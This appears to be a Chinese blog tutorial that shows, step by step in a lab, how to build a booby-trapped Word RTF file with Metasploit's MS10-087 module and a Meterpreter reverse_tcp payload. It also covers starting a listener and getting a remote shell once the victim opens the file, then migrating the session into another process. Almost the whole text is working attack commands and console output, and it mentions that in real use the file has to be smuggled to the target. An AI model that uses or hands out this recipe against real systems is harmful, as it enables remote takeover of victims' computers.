客户端渗透之——基于Word文件格式的渗透攻击

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86633173

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86633173

攻击机： Kali 192.168.175.128

靶机 WinXP 192.168.175.130

程序 Office 2003

1.生成Word文档

msfconsole
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
set FILENAME word.rtf
exploit

具体如下：

msf5 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME word.rtf
FILENAME => word.rtf
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'word.rtf' file ...
[+] word.rtf stored at /root/.msf4/local/word.rtf
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > 

可以看到，在 /root/.msf4/local/目录下生成了word.rtf文件。

2.上传文件到靶机

在实际中，我们需要想办法将文件传到靶机上，这里，我就直接拷贝到靶机了

3.实施攻击

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
exploit

具体如下：

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 

4.打开Word文件

在靶机上利用Office 2003打开PDF文件

5.查看获得的Meterpreter

在攻击机Kali上，我们看到MSF控制台中获得了Meterpreter权限。

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1431) at 2019-01-24 16:05:52 +0800

meterpreter > 

最后，最好用migrate命令将当前会话进程绑定到系统的其他进程中。